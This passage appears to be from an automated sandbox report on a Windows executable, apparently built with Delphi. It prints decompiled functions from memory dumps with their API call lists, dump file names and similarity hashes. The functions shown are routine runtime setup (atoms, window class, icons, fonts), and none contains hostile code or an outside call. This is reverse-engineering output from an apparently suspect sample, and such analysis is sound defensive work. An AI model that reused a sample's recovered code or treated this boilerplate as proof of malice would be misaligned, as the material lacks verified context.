    					} while (_t314 != 0);
    					goto L5;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID:
    • String ID: RegisterAutomation$vcltest3.dll
    • API String ID: 0-2963190186
    • Opcode ID: dfaeb636a8e8e22a47af52abfbacdc4ec6991d271b28b2f830f381af54467704
    • Instruction ID: d87eb14d4ef7e58fa93488cbcb6b20c10af1f0403ce29b9ecefe0dc67f797670
    • Opcode Fuzzy Hash: dfaeb636a8e8e22a47af52abfbacdc4ec6991d271b28b2f830f381af54467704
    • Instruction Fuzzy Hash: 17E18134640204EFEB50DF69D585BAEB7F5EF48314F2481A6E8059B352C738EE61DB0A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00437334(void* __ecx, void* __edi, void* __esi) {
    				intOrPtr _t6;
    				intOrPtr _t8;
    				intOrPtr _t10;
    				intOrPtr _t12;
    				intOrPtr _t14;
    				void* _t16;
    				void* _t17;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				intOrPtr _t23;
    				intOrPtr _t28;
    
    				_t25 = __esi;
    				_t17 = __ecx;
    				_push(_t28);
    				_push(0x4373ba);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t28;
    				 *0x47bb04 =  *0x47bb04 - 1;
    				if( *0x47bb04 < 0) {
    					 *0x47bb00 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
    					_t31 =  *0x47bb00;
    					E00437100(_t16, __edi,  *0x47bb00);
    					_t6 =  *0x427f24; // 0x427f70
    					E004136A4(_t6, _t16, _t17,  *0x47bb00);
    					_t8 =  *0x427f24; // 0x427f70
    					E00413744(_t8, _t16, _t17, _t31);
    					_t21 =  *0x427f24; // 0x427f70
    					_t10 =  *0x4386d4; // 0x438720
    					E004136F0(_t10, _t16, _t21, __esi, _t31);
    					_t22 =  *0x427f24; // 0x427f70
    					_t12 =  *0x4373c4; // 0x437410
    					E004136F0(_t12, _t16, _t22, __esi, _t31);
    					_t23 =  *0x427f24; // 0x427f70
    					_t14 =  *0x4374e8; // 0x437534
    					E004136F0(_t14, _t16, _t23, _t25, _t31);
    				}
    				_pop(_t20);
    				 *[fs:eax] = _t20;
    				_push(0x4373c1);
    				return 0;
    			}
















    APIs
    • GetVersion.KERNEL32(00000000,004373BA), ref: 0043734E
      • Part of subcall function 00437100: GetCurrentProcessId.KERNEL32(?,00000000,00437278), ref: 00437121
      • Part of subcall function 00437100: GlobalAddAtomA.KERNEL32(00000000), ref: 00437154
      • Part of subcall function 00437100: GetCurrentThreadId.KERNEL32 ref: 0043716F
      • Part of subcall function 00437100: GlobalAddAtomA.KERNEL32(00000000), ref: 004371A5
      • Part of subcall function 00437100: RegisterClipboardFormatA.USER32(00000000), ref: 004371BB
      • Part of subcall function 00437100: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00437278), ref: 0043723F
      • Part of subcall function 00437100: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00437250
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
    • String ID: 4uC
    • API String ID: 3775504709-1639844295
    • Opcode ID: b0e071625ee2c133da4dc3b4961ed60cd76ebcba108abacc6d4abdab5fd32a15
    • Instruction ID: e82bbe59acc8904bf0fbaf066ad8e119d518100e30ed9d54c2293709790727f4
    • Opcode Fuzzy Hash: b0e071625ee2c133da4dc3b4961ed60cd76ebcba108abacc6d4abdab5fd32a15
    • Instruction Fuzzy Hash: D8F04FB520C5409BC631EF2AEE5392577E8E74C30479154BAFD4043762CA78AC52DA9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0044A56C(intOrPtr _a4) {
    				intOrPtr _t26;
    
    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
    				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
    				_push(_t26); // executed
    				L0040668C(); // executed
    				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
    				return _t26;
    			}





    APIs
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0044A596
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: NtdllProc_Window
    • String ID:
    • API String ID: 4255912815-0
    • Opcode ID: 25e5abac485f33f57cd8a93bd1c9b7b64e1a550050a37676b0de83a6e6b2d3e6
    • Instruction ID: 98d68a84a8c0b98390fd66d1092e039e29952e39b95ca993a05471481c520d49
    • Opcode Fuzzy Hash: 25e5abac485f33f57cd8a93bd1c9b7b64e1a550050a37676b0de83a6e6b2d3e6
    • Instruction Fuzzy Hash: B7F0C579205608AFCB40DF9DC588D4AFBE8BB4C260B058695BD88CB321C235FD808F94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00437100(void* __ebx, void* __edi, void* __eflags) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				long _v28;
    				char _v32;
    				char _v36;
    				intOrPtr _t25;
    				char _t29;
    				intOrPtr _t35;
    				intOrPtr _t38;
    				intOrPtr _t47;
    				intOrPtr _t49;
    				intOrPtr* _t50;
    				intOrPtr _t53;
    				struct HINSTANCE__* _t63;
    				intOrPtr* _t78;
    				intOrPtr* _t80;
    				intOrPtr _t83;
    				void* _t87;
    
    				_v20 = 0;
    				_v8 = 0;
    				_push(_t87);
    				_push(0x437278);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t87 + 0xffffffe0;
    				_v16 = GetCurrentProcessId();
    				_v12 = 0;
    				E00408D4C("Delphi%.8X", 0,  &_v16,  &_v8);
    				E00404234(0x47bb0c, _v8);
    				_t25 =  *0x47bb0c; // 0x232126c
    				 *0x47bb08 = GlobalAddAtomA(E004046A0(_t25));
    				_t29 =  *0x47b660; // 0x400000
    				_v36 = _t29;
    				_v32 = 0;
    				_v28 = GetCurrentThreadId();
    				_v24 = 0;
    				E00408D4C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
    				E00404234(0x47bb10, _v20);
    				_t35 =  *0x47bb10; // 0x2321288
    				 *0x47bb0a = GlobalAddAtomA(E004046A0(_t35));
    				_t38 =  *0x47bb10; // 0x2321288
    				 *0x47bb14 = RegisterClipboardFormatA(E004046A0(_t38));
    				 *0x47bb4c = E0041407C(1);
    				E00436D04();
    				 *0x47bafc = E00436B2C(1, 1);
    				_t47 = E00448C44(1, __edi);
    				_t78 =  *0x47a0fc; // 0x47bba0
    				 *_t78 = _t47;
    				_t49 = E00449D58(0, 1);
    				_t80 =  *0x479fc4; // 0x47bb9c
    				 *_t80 = _t49;
    				_t50 =  *0x479fc4; // 0x47bb9c
    				E0044B88C( *_t50, 1);
    				_t53 =  *0x426f5c; // 0x426f60
    				E00413830(_t53, 0x429058, 0x429068);
    				_t63 = GetModuleHandleA("USER32");
    				if(_t63 != 0) {
    					 *0x479958 = GetProcAddress(_t63, "AnimateWindow");
    				}
    				_pop(_t83);
    				 *[fs:eax] = _t83;
    				_push(0x43727f);
    				E004041E0( &_v20);
    				return E004041E0( &_v8);
    			}

























    APIs
    • GetCurrentProcessId.KERNEL32(?,00000000,00437278), ref: 00437121
    • GlobalAddAtomA.KERNEL32(00000000), ref: 00437154
    • GetCurrentThreadId.KERNEL32 ref: 0043716F
    • GlobalAddAtomA.KERNEL32(00000000), ref: 004371A5
    • RegisterClipboardFormatA.USER32(00000000), ref: 004371BB
      • Part of subcall function 0041407C: RtlInitializeCriticalSection.NTDLL(00411BB8), ref: 0041409B
      • Part of subcall function 00436D04: SetErrorMode.KERNEL32(00008000), ref: 00436D1D
      • Part of subcall function 00436D04: GetModuleHandleA.KERNEL32(USER32,00000000,00436E6A,?,00008000), ref: 00436D41
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436D4E
      • Part of subcall function 00436D04: LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E6A,?,00008000), ref: 00436D6A
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D8C
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436DA1
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436DB6
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436DCB
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436DE0
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436DF5
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436E0A
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436E1F
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436E34
      • Part of subcall function 00436D04: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436E49
      • Part of subcall function 00436D04: SetErrorMode.KERNEL32(?,00436E71,00008000), ref: 00436E64
      • Part of subcall function 00448C44: GetKeyboardLayout.USER32(00000000), ref: 00448C89
      • Part of subcall function 00448C44: 72E7AC50.USER32(00000000,?,?,00000000,?,004371FA,00000000,00000000,?,?,00000000,00437278), ref: 00448CDE
      • Part of subcall function 00449D58: LoadIconA.USER32(00400000,MAINICON), ref: 00449E3D
      • Part of subcall function 00449D58: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449E6F
      • Part of subcall function 00449D58: OemToCharA.USER32(?,?), ref: 00449E82
      • Part of subcall function 00449D58: CharNextA.USER32(?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ECF
      • Part of subcall function 00449D58: CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ED5
    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00437278), ref: 0043723F
    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00437250
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$`oB
    • API String ID: 3690044937-1005833924
    • Opcode ID: 5146434fdfbdc4460dad9b57f6a2d0fa7fa6e701714123dfc8f3f75c23661093
    • Instruction ID: 981530912e79286a959191c2dbf15e9e1924a0dbe368cfb6ab4586b50bd09b6e
    • Opcode Fuzzy Hash: 5146434fdfbdc4460dad9b57f6a2d0fa7fa6e701714123dfc8f3f75c23661093
    • Instruction Fuzzy Hash: 3F4181B06042448BCB00EFA5D882A8D77E5EB49304B50847EF904E7395DB3DA940CB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0044A074(void* __eax, void* __ebx, void* __ecx) {
    				struct _WNDCLASSA _v44;
    				char _v48;
    				char* _t22;
    				long _t23;
    				CHAR* _t26;
    				struct HINSTANCE__* _t27;
    				intOrPtr* _t29;
    				signed int _t32;
    				intOrPtr* _t33;
    				signed int _t36;
    				struct HINSTANCE__* _t37;
    				void* _t39;
    				CHAR* _t40;
    				struct HWND__* _t41;
    				char* _t47;
    				char* _t52;
    				long _t55;
    				long _t59;
    				struct HINSTANCE__* _t62;
    				intOrPtr _t64;
    				void* _t69;
    				struct HMENU__* _t70;
    				void* _t71;
    				intOrPtr _t77;
    				void* _t83;
    				short _t88;
    
    				_t71 = __ecx;
    				_v48 = 0;
    				_t69 = __eax;
    				_push(_t83);
    				_push(0x44a215);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t83 + 0xffffffd4;
    				if( *((char*)(__eax + 0xa4)) != 0) {
    					L13:
    					_pop(_t77);
    					 *[fs:eax] = _t77;
    					_push(0x44a21c);
    					return E004041E0( &_v48);
    				}
    				_t22 =  *0x47a020; // 0x47b044
    				if( *_t22 != 0) {
    					goto L13;
    				}
    				_t23 = E0041A898(E0044A5F4, __eax); // executed
    				 *(_t69 + 0x40) = _t23;
    				 *0x479c90 = L0040668C;
    				_t26 =  *0x479cb0; // 0x449d48
    				_t27 =  *0x47b660; // 0x400000
    				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
    					_t62 =  *0x47b660; // 0x400000
    					 *0x479c9c = _t62;
    					_t88 = RegisterClassA(0x479c8c);
    					if(_t88 == 0) {
    						_t64 =  *0x479dd8; // 0x41abd4
    						E00405DCC(_t64, _t71,  &_v48);
    						E0040B61C(_v48, 1);
    						E00403BF4();
    					}
    				}
    				_t29 =  *0x479e84; // 0x47b910
    				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
    				if(_t88 < 0) {
    					asm("adc eax, 0x0");
    				}
    				_t33 =  *0x479e84; // 0x47b910
    				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
    				if(_t88 < 0) {
    					asm("adc eax, 0x0");
    				}
    				_push(_t36);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t37 =  *0x47b660; // 0x400000
    				_push(_t37);
    				_push(0);
    				_t7 = _t69 + 0x8c; // 0x28300044
    				_t39 = E004046A0( *_t7);
    				_t40 =  *0x479cb0; // 0x449d48, executed
    				_t41 = E00406BE4(_t40, _t39); // executed
    				 *(_t69 + 0x30) = _t41;
    				_t9 = _t69 + 0x8c; // 0x442168
    				E004041E0(_t9);
    				 *((char*)(_t69 + 0xa4)) = 1;
    				_t11 = _t69 + 0x40; // 0x10940000
    				_t12 = _t69 + 0x30; // 0xe
    				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
    				_t47 =  *0x479efc; // 0x47bb00
    				if( *_t47 != 0) {
    					_t55 = E0044ACF4(_t69);
    					_t13 = _t69 + 0x30; // 0xe
    					SendMessageA( *_t13, 0x80, 1, _t55); // executed
    					_t59 = E0044ACF4(_t69);
    					_t14 = _t69 + 0x30; // 0xe
    					SetClassLongA( *_t14, 0xfffffff2, _t59);
    				}
    				_t15 = _t69 + 0x30; // 0xe
    				_t70 = GetSystemMenu( *_t15, 0);
    				DeleteMenu(_t70, 0xf030, 0);
    				DeleteMenu(_t70, 0xf000, 0);
    				_t52 =  *0x479efc; // 0x47bb00
    				if( *_t52 != 0) {
    					DeleteMenu(_t70, 0xf010, 0);
    				}
    				goto L13;
    			}






























    APIs
      • Part of subcall function 0041A898: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A8B6
    • GetClassInfoA.USER32(00400000,00449D48,?), ref: 0044A0D3
    • RegisterClassA.USER32(00479C8C), ref: 0044A0EB
      • Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE
    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 0044A187
    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 0044A1A9
    • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 0044A1BC
    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1C7
    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1D6
    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1E3
    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,004420DC), ref: 0044A1FA
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
    • String ID:
    • API String ID: 2103932818-0
    • Opcode ID: cb45d6e5f26240e71ca7a80016a499d2fac44638ba6d11600755cc0c7f2c70e9
    • Instruction ID: 59908207186d0517ff517afd40f6d34d13d899750b49cff9de71474d83d32dee
    • Opcode Fuzzy Hash: cb45d6e5f26240e71ca7a80016a499d2fac44638ba6d11600755cc0c7f2c70e9
    • Instruction Fuzzy Hash: A14156717402406FEB11EF69DC82F6637E8AB44708F154476F905EF2E2DAB9AC90872D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00449D58(void* __ecx, char __edx) {
    				char _v5;
    				char* _v12;
    				char _v268;
    				void* __ebx;
    				void* __ebp;
    				intOrPtr _t44;
    				intOrPtr _t47;
    				intOrPtr _t48;
    				struct HINSTANCE__** _t58;
    				intOrPtr _t63;
    				struct HINSTANCE__** _t65;
    				CHAR* _t76;
    				char* _t80;
    				intOrPtr _t86;
    				intOrPtr* _t94;
    				intOrPtr* _t95;
    				intOrPtr _t96;
    				void* _t97;
    				char _t99;
    				void* _t111;
    				void* _t112;
    
    				_t99 = __edx;
    				_t97 = __ecx;
    				if(__edx != 0) {
    					_t112 = _t112 + 0xfffffff0;
    					_t44 = E0040378C(_t44, _t111);
    				}
    				_v5 = _t99;
    				_t96 = _t44;
    				E00419808(_t97, 0);
    				_t47 =  *0x479f3c; // 0x4793c4
    				if( *((short*)(_t47 + 2)) == 0) {
    					_t95 =  *0x479f3c; // 0x4793c4
    					 *((intOrPtr*)(_t95 + 4)) = _t96;
    					 *_t95 = 0x44b2cc;
    				}
    				_t48 =  *0x479fe0; // 0x4793cc
    				if( *((short*)(_t48 + 2)) == 0) {
    					_t94 =  *0x479fe0; // 0x4793cc
    					 *((intOrPtr*)(_t94 + 4)) = _t96;
    					 *_t94 = E0044B4C4;
    				}
    				 *((char*)(_t96 + 0x34)) = 0;
    				 *((intOrPtr*)(_t96 + 0x90)) = E0040343C(1);
    				 *((intOrPtr*)(_t96 + 0xa8)) = E0040343C(1);
    				 *((intOrPtr*)(_t96 + 0x60)) = 0;
    				 *((intOrPtr*)(_t96 + 0x84)) = 0;
    				 *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
    				 *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
    				 *((char*)(_t96 + 0x7c)) = 1;
    				 *((intOrPtr*)(_t96 + 0x80)) = 0;
    				 *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
    				 *((char*)(_t96 + 0x88)) = 0;
    				 *((char*)(_t96 + 0x9d)) = 1;
    				 *((char*)(_t96 + 0xb4)) = 1;
    				 *((intOrPtr*)(_t96 + 0x98)) = E00421670(1);
    				_t58 =  *0x479e68; // 0x47b02c
    				E00421A40(_t57, LoadIconA( *_t58, "MAINICON"));
    				_t20 = _t96 + 0x98; // 0x736d
    				_t63 =  *_t20;
    				 *((intOrPtr*)(_t63 + 0x14)) = _t96;
    				 *((intOrPtr*)(_t63 + 0x10)) = 0x44bb14;
    				_t65 =  *0x479e68; // 0x47b02c
    				GetModuleFileNameA( *_t65,  &_v268, 0x100);
    				OemToCharA( &_v268,  &_v268);
    				_v12 = E0040C394( &_v268, _t97, 0x5c);
    				if(_v12 != 0) {
    					E0040867C( &_v268, _v12 + 1);
    				}
    				_v12 = E0040C3DC( &_v268, _t97, 0x2e);
    				if(_v12 != 0) {
    					 *_v12 = 0;
    				}
    				_t76 = CharNextA( &_v268); // executed
    				CharLowerA(_t76);
    				_t36 = _t96 + 0x8c; // 0x442168
    				E00404450(_t36, 0x100,  &_v268);
    				_t80 =  *0x479d6c; // 0x47b034
    				if( *_t80 == 0) {
    					E0044A074(_t96, _t96, 0x100); // executed
    				}
    				 *((char*)(_t96 + 0x59)) = 1;
    				 *((char*)(_t96 + 0x5a)) = 1;
    				 *((char*)(_t96 + 0x5b)) = 1;
    				 *((char*)(_t96 + 0x9e)) = 1;
    				 *((intOrPtr*)(_t96 + 0xa0)) = 0;
    				E0044BCF0(_t96, 0x100);
    				E0044C6D8(_t96);
    				_t86 = _t96;
    				if(_v5 != 0) {
    					E004037E4(_t86);
    					_pop( *[fs:0x0]);
    				}
    				return _t96;
    			}

























    APIs
    • LoadIconA.USER32(00400000,MAINICON), ref: 00449E3D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449E6F
    • OemToCharA.USER32(?,?), ref: 00449E82
    • CharNextA.USER32(?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ECF
    • CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ED5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Char$FileIconLoadLowerModuleNameNext
    • String ID: MAINICON
    • API String ID: 3256280155-2283262055
    • Opcode ID: 05d21aa22ea9c7efec68fc6d9cb4501e819924d88bf3c8ddec1fbc618abea674
    • Instruction ID: 92475986e9d9992ff72ecf269a4b4a4657f5706d7a07ba4ebe13b7d56500ee20
    • Opcode Fuzzy Hash: 05d21aa22ea9c7efec68fc6d9cb4501e819924d88bf3c8ddec1fbc618abea674
    • Instruction Fuzzy Hash: 3F5120709042448FDB41DF69D8C5BC97BE4AB15308F0480BAE848DF397DBB99D88CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00449450(void* __eax, void* __ebx, void* __ecx, void* __edi) {
    				char _v5;
    				struct tagLOGFONTA _v65;
    				struct tagLOGFONTA _v185;
    				struct tagLOGFONTA _v245;
    				void _v405;
    				void* _t23;
    				int _t27;
    				void* _t30;
    				intOrPtr _t38;
    				struct HFONT__* _t41;
    				struct HFONT__* _t45;
    				struct HFONT__* _t49;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				void* _t57;
    				void* _t72;
    				void* _t74;
    				void* _t75;
    				intOrPtr _t76;
    
    				_t72 = __edi;
    				_t74 = _t75;
    				_t76 = _t75 + 0xfffffe6c;
    				_t57 = __eax;
    				_v5 = 0;
    				if( *0x47bb9c != 0) {
    					_t54 =  *0x47bb9c; // 0x2321704
    					_t2 = _t54 + 0x88; // 0x1
    					_v5 =  *_t2;
    				}
    				_push(_t74);
    				_push(0x449595);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t76;
    				if( *0x47bb9c != 0) {
    					_t52 =  *0x47bb9c; // 0x2321704
    					E0044B88C(_t52, 0);
    				}
    				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
    					_t23 = GetStockObject(0xd);
    					_t7 = _t57 + 0x84; // 0x38004010
    					E0041CA24( *_t7, _t23, _t72);
    				} else {
    					_t49 = CreateFontIndirectA( &_v65); // executed
    					_t6 = _t57 + 0x84; // 0x38004010
    					E0041CA24( *_t6, _t49, _t72);
    				}
    				_v405 = 0x154;
    				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
    				if(_t27 == 0) {
    					_t14 = _t57 + 0x80; // 0x94000000
    					E0041CB08( *_t14, 8);
    					_t30 = GetStockObject(0xd);
    					_t15 = _t57 + 0x88; // 0x90000000
    					E0041CA24( *_t15, _t30, _t72);
    				} else {
    					_t41 = CreateFontIndirectA( &_v185);
    					_t11 = _t57 + 0x80; // 0x94000000
    					E0041CA24( *_t11, _t41, _t72);
    					_t45 = CreateFontIndirectA( &_v245);
    					_t13 = _t57 + 0x88; // 0x90000000
    					E0041CA24( *_t13, _t45, _t72);
    				}
    				_t16 = _t57 + 0x80; // 0x94000000
    				E0041C868( *_t16, 0xff000017);
    				_t17 = _t57 + 0x88; // 0x90000000
    				E0041C868( *_t17, 0xff000007);
    				 *[fs:eax] = 0xff000007;
    				_push(0x44959c);
    				if( *0x47bb9c != 0) {
    					_t38 =  *0x47bb9c; // 0x2321704
    					return E0044B88C(_t38, _v5);
    				}
    				return 0;
    			}























    APIs
    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004494A4
    • CreateFontIndirectA.GDI32(?), ref: 004494B1
    • GetStockObject.GDI32(0000000D), ref: 004494C7
      • Part of subcall function 0041CB08: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041CB15
    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004494F0
    • CreateFontIndirectA.GDI32(?), ref: 00449500
    • CreateFontIndirectA.GDI32(?), ref: 00449519
    • GetStockObject.GDI32(0000000D), ref: 0044953F
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
    • String ID:
    • API String ID: 2891467149-0
    • Opcode ID: 28951050b266b203e9353fbab2d7e8e42f92628062245b1178383aee8633c048
    • Instruction ID: 8691ace67e623fd5a667961d2ac2376c2f2b6bc9dda70795445b191ca38ebe6a
    • Opcode Fuzzy Hash: 28951050b266b203e9353fbab2d7e8e42f92628062245b1178383aee8633c048
    • Instruction Fuzzy Hash: 0431A630754204ABEB51FB69DC82B9A33E4AB44304F548076B94CDB2DBDA78AC45CF29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00401B76() {
    				intOrPtr* _v8;
    				void* _t17;
    				signed int _t19;
    				intOrPtr _t28;
    				void* _t29;
    				intOrPtr _t34;
    
    				_push(_t34);
    				_push(E00401C40);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t34;
    				_push(0x47b5c4);
    				L00401350();
    				if( *0x47b045 != 0) {
    					_push(0x47b5c4);
    					L00401358();
    				}
    				E004013F4(0x47b5e4);
    				E004013F4(0x47b5f4);
    				E004013F4(0x47b620);
    				_t17 = LocalAlloc(0, 0xff8); // executed
    				 *0x47b61c = _t17;
    				if( *0x47b61c != 0) {
    					_t19 = 3;
    					do {
    						_t29 =  *0x47b61c; // 0x5bc9b8
    						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
    						_t19 = _t19 + 1;
    					} while (_t19 != 0x401);
    					_v8 = 0x47b604;
    					 *((intOrPtr*)(_v8 + 4)) = _v8;
    					 *_v8 = _v8;
    					 *0x47b610 = _v8;
